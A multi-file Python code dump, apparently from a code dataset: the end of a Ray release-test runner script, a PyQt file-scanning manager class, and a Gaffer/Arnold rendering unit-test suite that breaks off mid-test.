"Anyscale connect."
assert not check_progress, \
"--check is unsupported when running with Anyscale connect."
if test_config.get("artifacts", {}):
logger.error(
"Saving artifacts are not yet supported when running with "
"Anyscale connect.")
result = run_test_config(
local_dir,
project_id,
test_name,
test_config,
commit_url,
session_name=session_name,
smoke_test=smoke_test,
no_terminate=no_terminate,
kick_off_only=kick_off_only,
check_progress=check_progress,
upload_artifacts=report,
app_config_id_override=app_config_id_override)
status = result.get("status", "invalid")
if kick_off_only:
if status != "kickoff":
raise RuntimeError("Error kicking off test.")
logger.info("Kicked off test. It's now up to the `--check` "
"part of the script to track its process.")
return
else:
# `--check` or no kick off only
if status == "nosession":
logger.info(f"No running session found for test {test_name}, so "
f"assuming everything is fine.")
return
if status == "kickoff":
logger.info(f"Test {test_name} is still running.")
return
last_logs = result.get("last_logs", "No logs.")
test_suite = os.path.basename(test_config_file).replace(".yaml", "")
report_kwargs = dict(
test_suite=test_suite,
test_name=test_name,
status=status,
logs=last_logs,
results=result.get("results", {}),
artifacts=result.get("artifacts", {}),
category=category,
)
if report:
report_result(**report_kwargs)
else:
logger.info(f"Usually I would now report the following results:\n"
f"{report_kwargs}")
if has_errored(result):
raise RuntimeError(last_logs)
return
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument(
"--test-config", type=str, required=True, help="Test config file")
parser.add_argument("--test-name", type=str, help="Test name in config")
parser.add_argument(
"--ray-wheels", required=False, type=str, help="URL to ray wheels")
parser.add_argument(
"--no-terminate",
action="store_true",
default=False,
help="Don't terminate session after failure")
parser.add_argument(
"--no-report",
action="store_true",
default=False,
help="Do not report any results or upload to S3")
parser.add_argument(
"--kick-off-only",
action="store_true",
default=False,
help="Kick off only (don't wait for command to finish)")
parser.add_argument(
"--check",
action="store_true",
default=False,
help="Check (long running) status")
parser.add_argument(
"--category",
type=str,
default="unspecified",
help="Category name, e.g. `release-1.3.0` (will be saved in database)")
parser.add_argument(
"--smoke-test", action="store_true", help="Finish quickly for testing")
parser.add_argument(
"--session-name",
required=False,
type=str,
help="Name of the session to run this test.")
parser.add_argument(
"--app-config-id-override",
required=False,
type=str,
help=("An app config ID, which will override the test config app "
"config."))
args, _ = parser.parse_known_args()
if not GLOBAL_CONFIG["ANYSCALE_PROJECT"]:
raise RuntimeError(
"You have to set the ANYSCALE_PROJECT environment variable!")
maybe_fetch_api_token()
if args.ray_wheels:
os.environ["RAY_WHEELS"] = str(args.ray_wheels)
url = str(args.ray_wheels)
elif not args.check:
url = find_ray_wheels(
GLOBAL_CONFIG["RAY_REPO"],
GLOBAL_CONFIG["RAY_BRANCH"],
GLOBAL_CONFIG["RAY_VERSION"],
)
if not url:
raise RuntimeError(f"Could not find wheels for "
f"Ray {GLOBAL_CONFIG['RAY_VERSION']}, "
f"branch {GLOBAL_CONFIG['RAY_BRANCH']}")
# RAY_COMMIT is set by find_ray_wheels
populate_wheels_sanity_check(os.environ.get("RAY_COMMIT", ""))
test_config_file = os.path.abspath(os.path.expanduser(args.test_config))
run_test(
test_config_file=test_config_file,
test_name=args.test_name,
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"],
commit_url=url,
category=args.category,
smoke_test=args.smoke_test,
no_terminate=args.no_terminate or args.kick_off_only,
kick_off_only=args.kick_off_only,
check_progress=args.check,
report=not args.no_report,
session_name=args.session_name,
app_config_id_override=args.app_config_id_override,
)
|
fsfilemanager.py | import threading
import os
from PyQt5.QtCore import QThread
from util.fslogger import FSLogger
from model.fstreeitem import FSTreeItem, FSExtensionType
from task.fsfilescannertask import FSFileScannerContext, FSFileScannerTask
class FSFileManager(object):
_INST_LOCK = threading.Lock()
_INSTANCE = None
@classmethod
def get_instance(cls):
""" Method for getting the only instance """
if cls._INSTANCE is None:
with cls._INST_LOCK:
if cls._INSTANCE is None:
cls._INSTANCE = FSFileManager()
assert cls._INSTANCE is not None
return cls._INSTANCE
def __new__(cls, *args, **kwargs):
""" To make sure there will be only one instance """
if not isinstance(cls._INSTANCE, cls):
cls._INSTANCE = object.__new__(cls, *args, **kwargs)
return cls._INSTANCE
def __init__(self):
self._logger = FSLogger.get_instance()
self._path = "."
self._items = list()
@property
def path(self):
return self._path
@path.setter
def path(self, value):
assert os.path.isdir(value)
self._path = value
self.update()
@property
def items(self):
return self._items
def update(self):
self._logger.info("Launch thread ..")
update_thread = threading.Thread(target=self.update_w)
update_thread.start()
self._logger.info("Done")
def update_w(self):
self._logger.info("Scanning files in %s", self.path)
self.items.clear()
extension_items = dict()
root_item = FSTreeItem("Extensions", FSExtensionType.TYPE_EXTENSION, path=None, parent=None)
self.items.append(root_item)
for root, dirs, files in os.walk(self.path):
for file in files:
extension = os.path.splitext(file)[1]
if extension not in extension_items.keys():
extension_items[extension] = FSTreeItem(extension, FSExtensionType.TYPE_EXTENSION, path=None,
parent=root_item)
extension_item = extension_items[extension]
self.items.append(
FSTreeItem(file, FSExtensionType.TYPE_FILE, path=os.path.join(root, file), parent=extension_item))
self._logger.info("%d items found", len(self.items))
|
ArnoldRenderTest.py | ##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import inspect
import unittest
import subprocess32 as subprocess
import threading
import arnold
import imath
import IECore
import IECoreImage
import IECoreScene
import IECoreArnold
import Gaffer
import GafferTest
import GafferDispatch
import GafferImage
import GafferScene
import GafferSceneTest
import GafferOSL
import GafferArnold
import GafferArnoldTest
class ArnoldRenderTest( GafferSceneTest.SceneTestCase ) :
def setUp( self ) :
GafferSceneTest.SceneTestCase.setUp( self )
self.__scriptFileName = self.temporaryDirectory() + "/test.gfr"
def tearDown( self ) :
GafferSceneTest.SceneTestCase.tearDown( self )
GafferScene.deregisterAdaptor( "Test" )
def testExecute( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["render"] = GafferArnold.ArnoldRender()
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["in"].setInput( s["plane"]["out"] )
s["expression"] = Gaffer.Expression()
s["expression"].setExpression( "parent['render']['fileName'] = '" + self.temporaryDirectory() + "/test.%d.ass' % int( context['frame'] )" )
s["fileName"].setValue( self.__scriptFileName )
s.save()
p = subprocess.Popen(
"gaffer execute " + self.__scriptFileName + " -frames 1-3",
shell=True,
stderr = subprocess.PIPE,
)
p.wait()
self.failIf( p.returncode )
for i in range( 1, 4 ) :
self.failUnless( os.path.exists( self.temporaryDirectory() + "/test.%d.ass" % i ) )
def testWaitForImage( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
self.temporaryDirectory() + "/test.tif",
"tiff",
"rgba",
{}
)
)
s["outputs"]["in"].setInput( s["plane"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
s["render"]["task"].execute()
self.failUnless( os.path.exists( self.temporaryDirectory() + "/test.tif" ) )
def testExecuteWithStringSubstitutions( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["render"] = GafferArnold.ArnoldRender()
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["in"].setInput( s["plane"]["out"] )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
s["fileName"].setValue( self.__scriptFileName )
s.save()
p = subprocess.Popen(
"gaffer execute " + self.__scriptFileName + " -frames 1-3",
shell=True,
stderr = subprocess.PIPE,
)
p.wait()
self.failIf( p.returncode )
for i in range( 1, 4 ) :
self.failUnless( os.path.exists( self.temporaryDirectory() + "/test.%04d.ass" % i ) )
def testImageOutput( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
self.temporaryDirectory() + "/test.####.tif",
"tiff",
"rgba",
{}
)
)
s["outputs"]["in"].setInput( s["plane"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
c = Gaffer.Context()
for i in range( 1, 4 ) :
c.setFrame( i )
with c :
s["render"]["task"].execute()
for i in range( 1, 4 ) :
self.failUnless( os.path.exists( self.temporaryDirectory() + "/test.%04d.tif" % i ) )
def testTypeNamePrefixes( self ) :
self.assertTypeNamesArePrefixed( GafferArnold )
self.assertTypeNamesArePrefixed( GafferArnoldTest )
def testDefaultNames( self ) :
self.assertDefaultNamesAreCorrect( GafferArnold )
self.assertDefaultNamesAreCorrect( GafferArnoldTest )
def testNodesConstructWithDefaultValues( self ) :
self.assertNodesConstructWithDefaultValues( GafferArnold )
self.assertNodesConstructWithDefaultValues( GafferArnoldTest )
def testDirectoryCreation( self ) :
s = Gaffer.ScriptNode()
s["variables"].addChild( Gaffer.NameValuePlug( "renderDirectory", self.temporaryDirectory() + "/renderTests" ) )
s["variables"].addChild( Gaffer.NameValuePlug( "assDirectory", self.temporaryDirectory() + "/assTests" ) )
s["plane"] = GafferScene.Plane()
s["outputs"] = GafferScene.Outputs()
s["outputs"]["in"].setInput( s["plane"]["out"] )
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
"$renderDirectory/test.####.exr",
"exr",
"rgba",
{}
)
)
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
s["render"]["fileName"].setValue( "$assDirectory/test.####.ass" )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
s["fileName"].setValue( self.temporaryDirectory() + "/test.gfr" )
with s.context() :
s["render"]["task"].execute()
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
# check it can cope with everything already existing
with s.context() :
s["render"]["task"].execute()
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
def testWedge( self ) :
s = Gaffer.ScriptNode()
s["sphere"] = GafferScene.Sphere()
s["sphere"]["sets"].setValue( "${wedge:value}" )
s["filter"] = GafferScene.SetFilter()
s["filter"]["setExpression"].setValue( "hidden" )
s["attributes"] = GafferScene.StandardAttributes()
s["attributes"]["attributes"]["visibility"]["enabled"].setValue( True )
s["attributes"]["attributes"]["visibility"]["value"].setValue( False )
s["attributes"]["filter"].setInput( s["filter"]["out"] )
s["attributes"]["in"].setInput( s["sphere"]["out"] )
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
self.temporaryDirectory() + "/${wedge:value}.tif",
"tiff",
"rgba",
{
}
)
)
s["outputs"]["in"].setInput( s["attributes"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
s["render"]["in"].setInput( s["outputs"]["out"] )
s["wedge"] = Gaffer.Wedge()
s["wedge"]["mode"].setValue( int( s["wedge"].Mode.StringList ) )
s["wedge"]["strings"].setValue( IECore.StringVectorData( [ "visible", "hidden" ] ) )
s["wedge"]["preTasks"][0].setInput( s["render"]["task"] )
s["fileName"].setValue( self.temporaryDirectory() + "/test.gfr" )
s.save()
dispatcher = GafferDispatch.LocalDispatcher()
dispatcher["jobsDirectory"].setValue( self.temporaryDirectory() + "/testJobDirectory" )
dispatcher["framesMode"].setValue( GafferDispatch.Dispatcher.FramesMode.CurrentFrame )
dispatcher["executeInBackground"].setValue( False )
dispatcher.dispatch( [ s["wedge"] ] )
hidden = GafferImage.ImageReader()
hidden["fileName"].setValue( self.temporaryDirectory() + "/hidden.tif" )
visible = GafferImage.ImageReader()
visible["fileName"].setValue( self.temporaryDirectory() + "/visible.tif" )
hiddenStats = GafferImage.ImageStats()
hiddenStats["in"].setInput( hidden["out"] )
hiddenStats["area"].setValue( hiddenStats["in"]["dataWindow"].getValue() )
visibleStats = GafferImage.ImageStats()
visibleStats["in"].setInput( visible["out"] )
visibleStats["area"].setValue( visibleStats["in"]["dataWindow"].getValue() )
self.assertLess( hiddenStats["average"].getValue()[0], 0.05 )
self.assertGreater( visibleStats["average"].getValue()[0], .27 )
@staticmethod
def __m44f( m ) :
return imath.M44f( *[ i for row in m.data for i in row ] )
def testTransformMotion( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["sphere"] = GafferScene.Sphere()
s["group"] = GafferScene.Group()
s["group"]["in"][0].setInput( s["plane"]["out"] )
s["group"]["in"][1].setInput( s["sphere"]["out"] )
s["expression"] = Gaffer.Expression()
s["expression"].setExpression(
inspect.cleandoc(
"""
parent["plane"]["transform"]["translate"]["x"] = context.getFrame()
parent["sphere"]["transform"]["translate"]["y"] = context.getFrame() * 2
parent["group"]["transform"]["translate"]["z"] = context.getFrame() - 1
"""
)
)
s["planeFilter"] = GafferScene.PathFilter()
s["planeFilter"]["paths"].setValue( IECore.StringVectorData( [ "/group/plane" ] ) )
s["attributes"] = GafferScene.StandardAttributes()
s["attributes"]["in"].setInput( s["group"]["out"] )
s["attributes"]["filter"].setInput( s["planeFilter"]["out"] )
s["attributes"]["attributes"]["transformBlur"]["enabled"].setValue( True )
s["attributes"]["attributes"]["transformBlur"]["value"].setValue( False )
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["attributes"]["out"] )
s["options"]["options"]["shutter"]["enabled"].setValue( True )
s["options"]["options"]["transformBlur"]["enabled"].setValue( True )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# No motion blur
s["options"]["options"]["transformBlur"]["value"].setValue( False )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrix = arnold.AiNodeGetMatrix( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrix = arnold.AiNodeGetMatrix( plane, "matrix" )
# Motion parameters should be left at default
self.assertEqual( sphereMotionStart, 0 )
self.assertEqual( sphereMotionEnd, 1 )
self.assertEqual( planeMotionStart, 0 )
self.assertEqual( planeMotionEnd, 1 )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, 2, 0 ) )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, 0 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 1 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 1 )
# Motion blur
s["options"]["options"]["transformBlur"]["value"].setValue( True )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrices = arnold.AiNodeGetArray( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrices = arnold.AiNodeGetArray( plane, "matrix" )
self.assertEqual( sphereMotionStart, 0.75 )
self.assertEqual( sphereMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( sphereMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( sphereMatrices.contents ), 2 )
self.assertEqual( planeMotionStart, 0.75 )
self.assertEqual( planeMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( planeMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( planeMatrices.contents ), 2 )
for i in range( 0, 2 ) :
frame = 0.75 + 0.5 * i
sphereMatrix = arnold.AiArrayGetMtx( sphereMatrices, i )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, frame * 2, frame - 1 ) )
planeMatrix = arnold.AiArrayGetMtx( planeMatrices, i )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, frame - 1 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 0.75 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 1.25 )
# Motion blur on, but sampleMotion off
s["options"]["options"]["sampleMotion"]["enabled"].setValue( True )
s["options"]["options"]["sampleMotion"]["value"].setValue( False )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrices = arnold.AiNodeGetArray( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrices = arnold.AiNodeGetArray( plane, "matrix" )
self.assertEqual( sphereMotionStart, 0.75 )
self.assertEqual( sphereMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( sphereMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( sphereMatrices.contents ), 2 )
self.assertEqual( planeMotionStart, 0.75 )
self.assertEqual( planeMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( planeMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( planeMatrices.contents ), 2 )
for i in range( 0, 2 ) :
frame = 0.75 + 0.5 * i
sphereMatrix = arnold.AiArrayGetMtx( sphereMatrices, i )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, frame * 2, frame - 1 ) )
planeMatrix = arnold.AiArrayGetMtx( planeMatrices, i )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, frame - 1 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 0.75 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 0.75 )
def testResolution( self ) :
s = Gaffer.ScriptNode()
s["camera"] = GafferScene.Camera()
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["camera"]["out"] )
s["options"]["options"]["renderResolution"]["enabled"].setValue( True )
s["options"]["options"]["renderResolution"]["value"].setValue( imath.V2i( 200, 100 ) )
s["options"]["options"]["resolutionMultiplier"]["enabled"].setValue( True )
s["options"]["options"]["resolutionMultiplier"]["value"].setValue( 2 )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# Default camera should have the right resolution.
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 400 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 200 )
# As should a camera picked from the scene.
s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
s["options"]["options"]["renderCamera"]["value"].setValue( "/camera" )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 400 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 200 )
def testRenderRegion( self ) :
s = Gaffer.ScriptNode()
s["camera"] = GafferScene.Camera()
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["camera"]["out"] )
s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
s["options"]["options"]["renderCamera"]["value"].setValue( "/camera" )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# Default region
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 639 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 479 )
# Apply Crop Window
s["options"]["options"]["renderCropWindow"]["enabled"].setValue( True )
s["options"]["options"]["renderCropWindow"]["value"].setValue( imath.Box2f( imath.V2f( 0.25, 0.5 ), imath.V2f( 0.75, 1.0 ) ) )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 160 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 479 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 240 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 479 )
# Test Empty Crop Window
s["options"]["options"]["renderCropWindow"]["value"].setValue( imath.Box2f() )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
# Since Arnold doesn't support empty regions, we default to one pixel in the corner
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 479 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 479 )
# Apply Overscan
s["options"]["options"]["renderCropWindow"]["enabled"].setValue( False )
s["options"]["options"]["overscan"]["enabled"].setValue( True )
s["options"]["options"]["overscan"]["value"].setValue( True )
s["options"]["options"]["overscanTop"]["enabled"].setValue( True )
s["options"]["options"]["overscanTop"]["value"].setValue( 0.1 )
s["options"]["options"]["overscanBottom"]["enabled"].setValue( True )
s["options"]["options"]["overscanBottom"]["value"].setValue( 0.2 )
s["options"]["options"]["overscanLeft"]["enabled"].setValue( True )
s["options"]["options"]["overscanLeft"]["value"].setValue( 0.3 )
s["options"]["options"]["overscanRight"]["enabled"].setValue( True )
s["options"]["options"]["overscanRight"]["value"].setValue( 0.4 )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions()
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), -192 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 640 + 255 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), -48 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 480 + 95 )
def testMissingCameraRaises( self ) :
s = Gaffer.ScriptNode()
s["options"] = GafferScene.StandardOptions()
s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
s["options"]["options"]["renderCamera"]["value"].setValue( "/i/dont/exist" )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# The requested camera doesn't exist - this should raise an exception.
self.assertRaisesRegexp( RuntimeError, "/i/dont/exist", s["render"]["task"].execute )
# And even the existence of a different camera shouldn't change that.
s["camera"] = GafferScene.Camera()
s["options"]["in"].setInput( s["camera"]["out"] )
self.assertRaisesRegexp( RuntimeError, "/i/dont/exist", s["render"]["task"].execute )
def testManyCameras( self ) :
camera = GafferScene.Camera()
duplicate = GafferScene.Duplicate()
duplicate["in"].setInput( camera["out"] )
duplicate["target"].setValue( "/camera" )
duplicate["copies"].setValue( 1000 )
render = GafferArnold.ArnoldRender()
render["in"].setInput( duplicate["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
def testTwoRenders( self ) :
sphere = GafferScene.Sphere()
duplicate = GafferScene.Duplicate()
duplicate["in"].setInput( sphere["out"] )
duplicate["target"].setValue( "/sphere" )
duplicate["copies"].setValue( 10000 )
render = GafferArnold.ArnoldRender()
render["in"].setInput( duplicate["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
errors = []
def executeFrame( frame ) :
with Gaffer.Context() as c :
c.setFrame( frame )
try :
render["task"].execute()
except Exception as e :
errors.append( str( e ) )
threads = []
for i in range( 0, 2 ) :
t = threading.Thread( target = executeFrame, args = ( i, ) )
t.start()
threads.append( t )
for t in threads :
t.join()
self.assertEqual( len( errors ), 1 )
self.assertTrue( "Arnold is already in use" in errors[0] )
def testTraceSets( self ) :
sphere = GafferScene.Sphere()
group = GafferScene.Group()
group["in"][0].setInput( sphere["out"] )
group["in"][1].setInput( sphere["out"] )
set1 = GafferScene.Set()
set1["name"].setValue( "render:firstSphere" )
set1["paths"].setValue( IECore.StringVectorData( [ "/group/sphere" ] ) )
set1["in"].setInput( group["out"] )
set2 = GafferScene.Set()
set2["name"].setValue( "render:secondSphere" )
set2["paths"].setValue( IECore.StringVectorData( [ "/group/sphere1" ] ) )
set2["in"].setInput( set1["out"] )
set3 = GafferScene.Set()
set3["name"].setValue( "render:group" )
set3["paths"].setValue( IECore.StringVectorData( [ "/group" ] ) )
